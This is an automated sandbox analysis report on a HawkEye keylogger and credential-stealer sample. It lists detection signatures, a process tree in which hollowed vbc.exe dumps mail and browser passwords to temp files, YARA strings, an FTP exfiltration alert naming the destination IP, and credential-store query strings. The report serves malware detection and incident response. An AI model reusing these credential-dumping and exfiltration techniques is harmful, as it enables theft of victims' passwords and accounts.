Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
tDb0ggawON

Overview

General Information

Sample Name:tDb0ggawON (renamed file extension from none to exe)
Analysis ID:571678
MD5:91de6efc69676a4dd4ced5e2111ab489
SHA1:262f23feee502e24d6d044c05bcb7b3153b3920e
SHA256:57754827b4e179d20088be1aa0fec9d1f8e3a872e81103b2c7264f80a0a86b36
Tags:32exeHawkEyetrojan
Infos:

Detection

HawkEye MailPassView
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected MailPassView
Multi AV Scanner detection for submitted file
Yara detected HawkEye Keylogger
Malicious sample detected (through community Yara rule)
Detected unpacking (overwrites its own PE header)
Yara detected AntiVM3
Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Detected HawkEye Rat
Sample uses process hollowing technique
Tries to steal Mail credentials (via file / registry access)
.NET source code references suspicious native API functions
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Contains functionality to log keystrokes (.Net Source)
Tries to steal Mail credentials (via file registry)
Changes the view of files in windows explorer (hidden files and folders)
Machine Learning detection for sample
.NET source code contains potential unpacker
Yara detected WebBrowserPassView password recovery tool
Tries to steal Instant Messenger accounts or passwords
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Uses code obfuscation techniques (call, push, ret)
May infect USB drives
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Abnormal high CPU Usage
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
AV process strings found (often used to terminate AV products)
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
Extensive use of GetProcAddress (often used to hide API calls)
Detected TCP or UDP traffic on non-standard ports
Uses FTP
Creates a process in suspended mode (likely to inject code)
Contains functionality for read data from the clipboard

Classification

Process Tree

  • System is w10x64
  • tDb0ggawON.exe (PID: 5752 cmdline: "C:\Users\user\Desktop\tDb0ggawON.exe" MD5: 91DE6EFC69676A4DD4CED5E2111AB489)
    • tDb0ggawON.exe (PID: 3536 cmdline: C:\Users\user\Desktop\tDb0ggawON.exe MD5: 91DE6EFC69676A4DD4CED5E2111AB489)
      • vbc.exe (PID: 1632 cmdline: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext "C:\Users\user\AppData\Local\Temp\holderwb.txt" MD5: C63ED21D5706A527419C9FBD730FFB2E)
      • vbc.exe (PID: 2272 cmdline: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext "C:\Users\user\AppData\Local\Temp\holdermail.txt" MD5: C63ED21D5706A527419C9FBD730FFB2E)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_MailPassViewYara detected MailPassViewJoe Security
    0000000F.00000000.337528444.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_MailPassViewYara detected MailPassViewJoe Security
      0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_WebBrowserPassViewYara detected WebBrowserPassView password recovery toolJoe Security
        0000000B.00000000.296875600.0000000000402000.00000040.00000400.00020000.00000000.sdmpRAT_HawkEyeDetects HawkEye RATKevin Breen <kevin@techanarchy.net>
        • 0x7b748:$key: HawkEyeKeylogger
        • 0x7d946:$salt: 099u787978786
        • 0x7bd61:$string1: HawkEye_Keylogger
        • 0x7cbb4:$string1: HawkEye_Keylogger
        • 0x7d8a6:$string1: HawkEye_Keylogger
        • 0x7c14a:$string2: holdermail.txt
        • 0x7c16a:$string2: holdermail.txt
        • 0x7c08c:$string3: wallet.dat
        • 0x7c0a4:$string3: wallet.dat
        • 0x7c0ba:$string3: wallet.dat
        • 0x7d488:$string4: Keylog Records
        • 0x7d7a0:$string4: Keylog Records
        • 0x7d99e:$string5: do not script -->
        • 0x7b730:$string6: \pidloc.txt
        • 0x7b796:$string7: BSPLIT
        • 0x7b7a6:$string7: BSPLIT
        0000000B.00000000.296875600.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_MailPassViewYara detected MailPassViewJoe Security
          Click to see the 54 entries

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          11.2.tDb0ggawON.exe.81e0000.10.raw.unpackHKTL_NET_GUID_StealerDetects c# red/black-team tools via typelibguidArnim Rupp
          • 0x101b:$typelibguid0: 8fcd4931-91a2-4e18-849b-70de34ab75df
          11.2.tDb0ggawON.exe.45fa72.1.unpackJoeSecurity_MailPassViewYara detected MailPassViewJoe Security
            15.0.vbc.exe.400000.4.unpackJoeSecurity_MailPassViewYara detected MailPassViewJoe Security
              15.0.vbc.exe.400000.2.unpackJoeSecurity_MailPassViewYara detected MailPassViewJoe Security
                15.0.vbc.exe.400000.3.unpackJoeSecurity_MailPassViewYara detected MailPassViewJoe Security
                  Click to see the 181 entries

                  Sigma Signatures

                  There are no malicious signatures, click here to show all signatures.

                  Source: Process startedAuthor: frack113: Data: Command: C:\Users\user\Desktop\tDb0ggawON.exe, CommandLine: C:\Users\user\Desktop\tDb0ggawON.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\Desktop\tDb0ggawON.exe, NewProcessName: C:\Users\user\Desktop\tDb0ggawON.exe, OriginalFileName: C:\Users\user\Desktop\tDb0ggawON.exe, ParentCommandLine: "C:\Users\user\Desktop\tDb0ggawON.exe" , ParentImage: C:\Users\user\Desktop\tDb0ggawON.exe, ParentProcessId: 5752, ProcessCommandLine: C:\Users\user\Desktop\tDb0ggawON.exe, ProcessId: 3536

                  Joe Sandbox Signatures

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Multi AV Scanner detection for submitted file
                  Source: tDb0ggawON.exeVirustotal: Detection: 33%Perma Link
                  Source: tDb0ggawON.exeMetadefender: Detection: 14%Perma Link
                  Source: tDb0ggawON.exeReversingLabs: Detection: 39%
                  Antivirus / Scanner detection for submitted sample
                  Source: tDb0ggawON.exeAvira: detected
                  Machine Learning detection for sample
                  Source: tDb0ggawON.exeJoe Sandbox ML: detected
                  Source: 15.0.vbc.exe.400000.4.unpackAvira: Label: SPR/Tool.MailPassView.473
                  Source: 11.0.tDb0ggawON.exe.400000.21.unpackAvira: Label: TR/AD.MExecute.lzrac
                  Source: 11.0.tDb0ggawON.exe.400000.21.unpackAvira: Label: SPR/Tool.MailPassView.473
                  Source: 15.0.vbc.exe.400000.2.unpackAvira: Label: SPR/Tool.MailPassView.473
                  Source: 15.0.vbc.exe.400000.3.unpackAvira: Label: SPR/Tool.MailPassView.473
                  Source: 11.0.tDb0ggawON.exe.400000.11.unpackAvira: Label: TR/AD.MExecute.lzrac
                  Source: 11.0.tDb0ggawON.exe.400000.11.unpackAvira: Label: SPR/Tool.MailPassView.473
                  Source: 15.0.vbc.exe.400000.1.unpackAvira: Label: SPR/Tool.MailPassView.473
                  Source: 11.0.tDb0ggawON.exe.400000.4.unpackAvira: Label: TR/AD.MExecute.lzrac
                  Source: 11.0.tDb0ggawON.exe.400000.4.unpackAvira: Label: SPR/Tool.MailPassView.473
                  Source: 11.2.tDb0ggawON.exe.400000.0.unpackAvira: Label: TR/AD.MExecute.lzrac
                  Source: 11.2.tDb0ggawON.exe.400000.0.unpackAvira: Label: SPR/Tool.MailPassView.473
                  Source: 11.0.tDb0ggawON.exe.400000.16.unpackAvira: Label: TR/AD.MExecute.lzrac
                  Source: 11.0.tDb0ggawON.exe.400000.16.unpackAvira: Label: SPR/Tool.MailPassView.473
                  Source: 15.0.vbc.exe.400000.0.unpackAvira: Label: SPR/Tool.MailPassView.473
                  Source: 11.0.tDb0ggawON.exe.400000.6.unpackAvira: Label: TR/AD.MExecute.lzrac
                  Source: 11.0.tDb0ggawON.exe.400000.6.unpackAvira: Label: SPR/Tool.MailPassView.473
                  Source: 0.2.tDb0ggawON.exe.fb0000.0.unpackAvira: Label: TR/Crypt.XPACK.Gen2

                  Compliance

                  barindex
                  Detected unpacking (overwrites its own PE header)
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeUnpacked PE file: 0.2.tDb0ggawON.exe.fb0000.0.unpack
                  Source: tDb0ggawON.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
                  Source: tDb0ggawON.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                  Source: Binary string: C:\Users\Jovan\Documents\Visual Studio 2010\Projects\Stealer\CMemoryExecute\CMemoryExecute\obj\Release\CMemoryExecute.pdb source: tDb0ggawON.exe, 00000000.00000002.303672569.0000000004CE9000.00000004.00000800.00020000.00000000.sdmp, tDb0ggawON.exe, 00000000.00000002.308274343.00000000062B1000.00000004.00000800.00020000.00000000.sdmp, tDb0ggawON.exe, 0000000B.00000000.296875600.0000000000402000.00000040.00000400.00020000.00000000.sdmp, tDb0ggawON.exe, 0000000B.00000002.520798219.00000000081E0000.00000004.08000000.00040000.00000000.sdmp, tDb0ggawON.exe, 0000000B.00000002.517829370.0000000003001000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: f:\Projects\VS2005\mailpv\Release\mailpv.pdb source: tDb0ggawON.exe, 00000000.00000002.303672569.0000000004CE9000.00000004.00000800.00020000.00000000.sdmp, tDb0ggawON.exe, 00000000.00000002.308274343.00000000062B1000.00000004.00000800.00020000.00000000.sdmp, tDb0ggawON.exe, 0000000B.00000000.296875600.0000000000402000.00000040.00000400.00020000.00000000.sdmp, tDb0ggawON.exe, 0000000B.00000002.518727160.0000000004001000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, vbc.exe, 0000000F.00000000.337528444.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 0000000F.00000000.337259386.0000000000400000.00000040.00000400.00020000.00000000.sdmp
                  Source: Binary string: f:\Projects\VS2005\WebBrowserPassView\Release\WebBrowserPassView.pdb source: tDb0ggawON.exe, 00000000.00000002.303672569.0000000004CE9000.00000004.00000800.00020000.00000000.sdmp, tDb0ggawON.exe, 00000000.00000002.308274343.00000000062B1000.00000004.00000800.00020000.00000000.sdmp, tDb0ggawON.exe, 0000000B.00000000.296875600.0000000000402000.00000040.00000400.00020000.00000000.sdmp, tDb0ggawON.exe, 0000000B.00000002.518727160.0000000004001000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, vbc.exe, 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 0000000E.00000000.335816568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 0000000E.00000000.336658254.0000000000400000.00000040.00000400.00020000.00000000.sdmp
                  Source: tDb0ggawON.exe, 00000000.00000002.303672569.0000000004CE9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: autorun.inf
                  Source: tDb0ggawON.exe, 00000000.00000002.303672569.0000000004CE9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: [autorun]
                  Source: tDb0ggawON.exe, 00000000.00000002.308274343.00000000062B1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: autorun.inf
                  Source: tDb0ggawON.exe, 00000000.00000002.308274343.00000000062B1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: [autorun]
                  Source: tDb0ggawON.exe, 0000000B.00000000.296875600.0000000000402000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: autorun.inf
                  Source: tDb0ggawON.exe, 0000000B.00000000.296875600.0000000000402000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: [autorun]
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 14_2_00408441 FindFirstFileW,FindNextFileW,wcslen,wcslen,14_2_00408441
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 14_2_00407E0E FindFirstFileW,FindNextFileW,FindClose,14_2_00407E0E
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 15_2_00406EC3 FindFirstFileA,FindNextFileA,strlen,strlen,15_2_00406EC3
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeCode function: 4x nop then lea esp, dword ptr [ebp-08h]11_2_078CFE8A
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeCode function: 4x nop then lea esp, dword ptr [ebp-08h]11_2_08260013

                  Networking

                  barindex
                  Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
                  Source: TrafficSnort IDS: 2020410 ET TROJAN HawkEye Keylogger FTP 192.168.2.5:49770 -> 66.70.204.222:21
                  Source: Joe Sandbox ViewASN Name: OVHFR OVHFR
                  Source: Joe Sandbox ViewIP Address: 66.70.204.222 66.70.204.222
                  Source: global trafficTCP traffic: 192.168.2.5:49771 -> 66.70.204.222:57948
                  Source: unknownFTP traffic detected: 66.70.204.222:21 -> 192.168.2.5:49770 220---------- Welcome to Pure-FTPd [privsep] [TLS] ---------- 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 3 of 50 allowed. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 3 of 50 allowed.220-Local time is now 12:44. Server port: 21. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 3 of 50 allowed.220-Local time is now 12:44. Server port: 21.220-This is a private system - No anonymous login 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 3 of 50 allowed.220-Local time is now 12:44. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 3 of 50 allowed.220-Local time is now 12:44. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.220 You will be disconnected after 15 minutes of inactivity.
                  Source: vbc.exe, 0000000E.00000003.349517440.0000000000C3E000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 0000000E.00000002.349986576.0000000000C3E000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 0000000E.00000003.349382801.0000000000C3E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: &ct=1601451842&rver=6.0.5286.0&wp=MBI_SSL&wreply=https:%2F%2fwww.bing.com%2Fsecure%2FPassport.aspx%3Fpopup%3D1%26ssl%3D1&lc=2055&id=264960&checkda=1https://login.live.com/login.srfhttps://www.google.com/chrome/https://www.google.com/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrowser=0https://www.google.com/chrome/thank-you.htmlhttps://www.microsoft.com/en-us/edge/?form=MA13DL&OCID=MA13DLhttps://www.microsoft.com/en-us/edge/https://www.microsoft.com/en-us/welcomeie11/https://www.microsoft.com/en-us/edge?form=MA13DL&OCID=MA13DLhttps://www.microsoft.com/en-us/edgehttps://www.microsoft.com/edge/?form=MA13DL&OCID=MA13DLhttps://www.microsoft.com/edge/https://adservice.google.com/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=5864849777998;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fabout:blankhttps://go.microsoft.com/fwlink/?LinkId=838604https://go.microsoft.com/fwlink/https://go.microsoft.com/fwlink/p/?LinkId=255141https://go.microsoft.com/fwlink/p/https://go.microsoft.com/fwlink/?LinkId=517287http://cookies.onetrust.mgr.consensu.org/?name=euconsent&value=&expire=0&isFirstRequest=truehttp://cookies.onetrust.mgr.consensu.org/https://login.live.com/me.srf?wa=wsignin1.0&wreply=https%3A%2F%2Fwww.microsoft.com&uaid=ac2466cf-394d-4fb0-8dd5-5f431e502c8a&partnerId=retailstore2https://login.live.com/me.srfhttps://login.live.com/me.srf?wa=wsignin1.0&wreply=https%3A%2F%2Fwww.microsoft.com&uaid=607a8c6f-153c-4a43-061d-c574b2427206&partnerId=retailstore2https://www.microsoft.com/en-us/welcomeie11/welcomeie11https://www.microsoft.com/store/buy/cartcounthttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/logintps://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chom0;ord=4842492154761;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fhttp://www.msn.com/?ocid=iehphttp://www.msn.com/http://www.msn.com/de-ch/?ocid=iehp equals www.facebook.com (Facebook)
                  Source: vbc.exe, 0000000E.00000003.349517440.0000000000C3E000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 0000000E.00000002.349986576.0000000000C3E000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 0000000E.00000003.349382801.0000000000C3E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: &ct=1601451842&rver=6.0.5286.0&wp=MBI_SSL&wreply=https:%2F%2fwww.bing.com%2Fsecure%2FPassport.aspx%3Fpopup%3D1%26ssl%3D1&lc=2055&id=264960&checkda=1https://login.live.com/login.srfhttps://www.google.com/chrome/https://www.google.com/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrowser=0https://www.google.com/chrome/thank-you.htmlhttps://www.microsoft.com/en-us/edge/?form=MA13DL&OCID=MA13DLhttps://www.microsoft.com/en-us/edge/https://www.microsoft.com/en-us/welcomeie11/https://www.microsoft.com/en-us/edge?form=MA13DL&OCID=MA13DLhttps://www.microsoft.com/en-us/edgehttps://www.microsoft.com/edge/?form=MA13DL&OCID=MA13DLhttps://www.microsoft.com/edge/https://adservice.google.com/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=5864849777998;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fabout:blankhttps://go.microsoft.com/fwlink/?LinkId=838604https://go.microsoft.com/fwlink/https://go.microsoft.com/fwlink/p/?LinkId=255141https://go.microsoft.com/fwlink/p/https://go.microsoft.com/fwlink/?LinkId=517287http://cookies.onetrust.mgr.consensu.org/?name=euconsent&value=&expire=0&isFirstRequest=truehttp://cookies.onetrust.mgr.consensu.org/https://login.live.com/me.srf?wa=wsignin1.0&wreply=https%3A%2F%2Fwww.microsoft.com&uaid=ac2466cf-394d-4fb0-8dd5-5f431e502c8a&partnerId=retailstore2https://login.live.com/me.srfhttps://login.live.com/me.srf?wa=wsignin1.0&wreply=https%3A%2F%2Fwww.microsoft.com&uaid=607a8c6f-153c-4a43-061d-c574b2427206&partnerId=retailstore2https://www.microsoft.com/en-us/welcomeie11/welcomeie11https://www.microsoft.com/store/buy/cartcounthttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/logintps://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chom0;ord=4842492154761;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fhttp://www.msn.com/?ocid=iehphttp://www.msn.com/http://www.msn.com/de-ch/?ocid=iehp equals www.yahoo.com (Yahoo)
                  Source: tDb0ggawON.exe, 00000000.00000002.303672569.0000000004CE9000.00000004.00000800.00020000.00000000.sdmp, tDb0ggawON.exe, 00000000.00000002.308274343.00000000062B1000.00000004.00000800.00020000.00000000.sdmp, tDb0ggawON.exe, 0000000B.00000000.296875600.0000000000402000.00000040.00000400.00020000.00000000.sdmp, tDb0ggawON.exe, 0000000B.00000002.518727160.0000000004001000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 0000000E.00000000.335816568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 0000000E.00000000.336658254.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: @nss3.dllSOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\seamonkey.exe%programfiles%\Sea MonkeySOFTWARE\Mozillamozilla%s\binPathToExe%programfiles%\Mozilla FirefoxSELECT id, hostname, httpRealm, formSubmitURL, usernameField, passwordField, encryptedUsername, encryptedPassword FROM moz_logins.---signons.txtsignons2.txtsignons3.txtsignons.sqlitenetmsg.dllUnknown Error\Error %d: %seditkernel32.dll... open %2.2X %s (%s)Microsoft_WinInetMicrosoft_WinInet_u7@dllhost.exetaskhost.exetaskhostex.exebhvContainersContainerIdNameHistoryContainer_%I64dAccessCountCreationTimeExpiryTimeAccessedTimeModifiedTimeUrlEntryIDvisited:Microsoft\Windows\WebCache\WebCacheV01.datMicrosoft\Windows\WebCache\WebCacheV24.dat0123456789ABCDEFURL index.datSoftware\Microsoft\Internet Explorer\IntelliForms\Storage2https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.facebook.com (Facebook)
                  Source: tDb0ggawON.exe, 00000000.00000002.303672569.0000000004CE9000.00000004.00000800.00020000.00000000.sdmp, tDb0ggawON.exe, 00000000.00000002.308274343.00000000062B1000.00000004.00000800.00020000.00000000.sdmp, tDb0ggawON.exe, 0000000B.00000000.296875600.0000000000402000.00000040.00000400.00020000.00000000.sdmp, tDb0ggawON.exe, 0000000B.00000002.518727160.0000000004001000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 0000000E.00000000.335816568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 0000000E.00000000.336658254.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: @nss3.dllSOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\seamonkey.exe%programfiles%\Sea MonkeySOFTWARE\Mozillamozilla%s\binPathToExe%programfiles%\Mozilla FirefoxSELECT id, hostname, httpRealm, formSubmitURL, usernameField, passwordField, encryptedUsername, encryptedPassword FROM moz_logins.---signons.txtsignons2.txtsignons3.txtsignons.sqlitenetmsg.dllUnknown Error\Error %d: %seditkernel32.dll... open %2.2X %s (%s)Microsoft_WinInetMicrosoft_WinInet_u7@dllhost.exetaskhost.exetaskhostex.exebhvContainersContainerIdNameHistoryContainer_%I64dAccessCountCreationTimeExpiryTimeAccessedTimeModifiedTimeUrlEntryIDvisited:Microsoft\Windows\WebCache\WebCacheV01.datMicrosoft\Windows\WebCache\WebCacheV24.dat0123456789ABCDEFURL index.datSoftware\Microsoft\Internet Explorer\IntelliForms\Storage2https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.yahoo.com (Yahoo)
                  Source: vbc.exeString found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
                  Source: bhvED7C.tmp.14.drString found in binary or memory: http://cacerts.digicert.com/DigiCertECCSecureServerCA.crt0
                  Source: bhvED7C.tmp.14.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
                  Source: bhvED7C.tmp.14.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2ExtendedValidationServerCA.crt0
                  Source: bhvED7C.tmp.14.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2HighAssuranceServerCA.crt0
                  Source: bhvED7C.tmp.14.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2SecureServerCA.crt0
                  Source: bhvED7C.tmp.14.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSecureSiteECCCA-1.crt0
                  Source: bhvED7C.tmp.14.drString found in binary or memory: http://cookies.onetrust.mgr.consensu.org/?name=euconsent&value=&expire=0&isFirstRequest=true
                  Source: bhvED7C.tmp.14.drString found in binary or memory: http://cookies.onetrust.mgr.consensu.org/onetrust-logo.svg
                  Source: tDb0ggawON.exe, 00000000.00000002.303672569.0000000004CE9000.00000004.00000800.00020000.00000000.sdmp, tDb0ggawON.exe, 00000000.00000002.308274343.00000000062B1000.00000004.00000800.00020000.00000000.sdmp, tDb0ggawON.exe, 0000000B.00000000.296875600.0000000000402000.00000040.00000400.00020000.00000000.sdmp, tDb0ggawON.exe, 0000000B.00000002.518727160.0000000004001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/COMODOCodeSigningCA2.crl0r
                  Source: bhvED7C.tmp.14.drString found in binary or memory: http://crl.globalsign.com/root.crl0V
                  Source: bhvED7C.tmp.14.drString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                  Source: bhvED7C.tmp.14.drString found in binary or memory: http://crl.pki.goog/GTS1O1core.crl0
                  Source: bhvED7C.tmp.14.drString found in binary or memory: http://crl.pki.goog/GTSGIAG3.crl0
                  Source: bhvED7C.tmp.14.drString found in binary or memory: http://crl.pki.goog/gsr2/gsr2.crl0?
                  Source: bhvED7C.tmp.14.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
                  Source: bhvED7C.tmp.14.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
                  Source: bhvED7C.tmp.14.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
                  Source: bhvED7C.tmp.14.drString found in binary or memory: http://crl3.digicert.com/DigiCertSecureSiteECCCA-1.crl0
                  Source: bhvED7C.tmp.14.drString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
                  Source: bhvED7C.tmp.14.drString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0=
                  Source: bhvED7C.tmp.14.drString found in binary or memory: http://crl3.digicert.com/sha2-ev-server-g2.crl04
                  Source: bhvED7C.tmp.14.drString found in binary or memory: http://crl3.digicert.com/sha2-ha-server-g6.crl04
                  Source: bhvED7C.tmp.14.drString found in binary or memory: http://crl3.digicert.com/ssca-ecc-g1.crl0.
                  Source: bhvED7C.tmp.14.drString found in binary or memory: http://crl3.digicert.com/ssca-sha2-g6.crl0/
                  Source: bhvED7C.tmp.14.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl0=
                  Source: bhvED7C.tmp.14.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
                  Source: bhvED7C.tmp.14.drString found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0=
                  Source: bhvED7C.tmp.14.drString found in binary or memory: http://crl4.digicert.com/DigiCertSecureSiteECCCA-1.crl0L
                  Source: bhvED7C.tmp.14.drString found in binary or memory: http://crl4.digicert.com/sha2-ev-server-g2.crl0K
                  Source: bhvED7C.tmp.14.drString found in binary or memory: http://crl4.digicert.com/sha2-ha-server-g6.crl0L
                  Source: bhvED7C.tmp.14.drString found in binary or memory: http://crl4.digicert.com/ssca-ecc-g1.crl0L
                  Source: bhvED7C.tmp.14.drString found in binary or memory: http://crl4.digicert.com/ssca-sha2-g6.crl0L
                  Source: tDb0ggawON.exe, 00000000.00000003.260814999.0000000008867000.00000004.00000800.00020000.00000000.sdmp, tDb0ggawON.exe, 00000000.00000003.260930392.0000000008867000.00000004.00000800.00020000.00000000.sdmp, tDb0ggawON.exe, 00000000.00000003.261060688.0000000008867000.00000004.00000800.00020000.00000000.sdmp, tDb0ggawON.exe, 00000000.00000003.261366265.0000000008868000.00000004.00000800.00020000.00000000.sdmp, tDb0ggawON.exe, 00000000.00000003.260697523.0000000008867000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://en.w
                  Source: tDb0ggawON.exe, 00000000.00000003.260814999.0000000008867000.00000004.00000800.00020000.00000000.sdmp, tDb0ggawON.exe, 00000000.00000003.260583898.0000000008867000.00000004.00000800.00020000.00000000.sdmp, tDb0ggawON.exe, 00000000.00000003.260469872.0000000008867000.00000004.00000800.00020000.00000000.sdmp, tDb0ggawON.exe, 00000000.00000003.260930392.0000000008867000.00000004.00000800.00020000.00000000.sdmp, tDb0ggawON.exe, 00000000.00000003.260697523.0000000008867000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://en.wikip
                  Source: tDb0ggawON.exe, 00000000.00000003.260004704.0000000008866000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://en.wz
                  Source: tDb0ggawON.exe, 00000000.00000002.310251418.0000000009A52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://fontfabrik.com
                  Source: tDb0ggawON.exe, 0000000B.00000002.518137618.000000000323E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ftp.manchutimefashion.com
                  Source: bhvED7C.tmp.14.drString found in binary or memory: http://images.outbrainimg.com/transform/v3/eyJpdSI6IiIsIml1ZSI6Imh0dHA6Ly9pbWFnZXMyLnplbWFudGEuY29tL
                  Source: bhvED7C.tmp.14.drString found in binary or memory: http://images.outbrainimg.com/transform/v3/eyJpdSI6IjE4MmE0M2M0MDY3OGU1N2E4MjhkM2NjNDdlNGMzZmNkYjU1N
                  Source: bhvED7C.tmp.14.drString found in binary or memory: http://images.outbrainimg.com/transform/v3/eyJpdSI6Ijc4NDFiMmZlNWMxZGU2M2JkNDdjMGQzZWI3NjIzYjlkNWU5N
                  Source: bhvED7C.tmp.14.drString found in binary or memory: http://images.outbrainimg.com/transform/v3/eyJpdSI6ImY3MDA1MDJkMTdmZDY0M2VkZTBjNzg5MTE1OWEyYTYxMWRiN
                  Source: bhvED7C.tmp.14.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA7XCQ3?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
